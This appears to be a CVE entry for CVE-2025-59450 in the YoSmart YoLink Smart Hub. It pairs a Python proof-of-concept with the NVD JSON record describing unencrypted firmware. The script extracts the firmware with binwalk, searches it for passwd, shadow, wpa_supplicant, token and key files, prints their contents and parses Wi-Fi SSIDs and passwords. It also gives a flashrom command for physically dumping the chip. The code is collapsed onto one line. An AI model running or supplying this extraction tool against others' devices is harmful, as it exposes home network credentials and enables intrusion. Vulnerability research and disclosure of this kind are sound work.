CVE-2025-59450

# CVE-2025-59450 PoC - YoSmart YoLink Smart Hub Firmware Extraction # This PoC demonstrates how to extract network credentials from unencrypted firmware import subprocess import os import sys def extract_firmware(firmware_path): """ Extract contents from unencrypted YoSmart YoLink Smart Hub firmware """ print(f"[*] Analyzing firmware: {firmware_path}") # Step 1: Use binwalk to scan and extract firmware contents print("[*] Running binwalk to identify file systems...") result = subprocess.run( ["binwalk", "-e", firmware_path], capture_output=True, text=True ) print(result.stdout) # Step 2: Search for sensitive configuration files extracted_dir = firmware_path + ".extracted" sensitive_patterns = [ "passwd", "shadow", "wpa_supplicant", "wireless", "wifi", "network", "config", "api_key", "token", "credential" ] print("[*] Searching for sensitive files...") credentials = {} for root, dirs, files in os.walk(extracted_dir): for file in files: for pattern in sensitive_patterns: if pattern in file.lower(): filepath = os.path.join(root, file) print(f"[+] Found sensitive file: {filepath}") with open(filepath, 'r', errors='ignore') as f: content = f.read() credentials[file] = content return credentials def parse_wifi_credentials(config_content): """ Parse Wi-Fi credentials from configuration content """ credentials = { "ssid": [], "password": [], "api_keys": [] } for line in config_content.split('\n'): line = line.strip() if 'ssid' in line.lower() and '=' in line: credentials["ssid"].append(line.split('=', 1)[1].strip('"')) if 'psk' in line.lower() or 'password' in line.lower() or 'key' in line.lower(): if '=' in line: credentials["password"].append(line.split('=', 1)[1].strip('"')) return credentials if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <firmware_binary>") sys.exit(1) firmware = sys.argv[1] if not os.path.exists(firmware): print(f"[!] Firmware file not found: {firmware}") sys.exit(1) creds = extract_firmware(firmware) print("\n[*] Extracted Credentials:") for fname, content in creds.items(): print(f"\n--- {fname} ---") print(content) # Alternative: Physical extraction via SPI programmer print("\n[*] For physical extraction, use:") print(" sudo flashrom -p ch341a_spi -r firmware_dump.bin") print(" binwalk -e firmware_dump.bin")

{"cve": {"id": "CVE-2025-59450", "sourceIdentifier": "[email protected]", "published": "2025-10-06T20:15:36.587", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The YoSmart YoLink Smart Hub firmware 0382 is unencrypted, and data extracted from it can be used to determine network access credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://bishopfox.com/blog/advisories", "source": "[email protected]"}, {"url": "https://bishopfox.com/blog/how-a-20-smart-device-gave-me-access-to-your-home", "source": "[email protected]"}, {"url": "https://shop.yosmart.com/pages/product-support", "source": "[email protected]"}]}}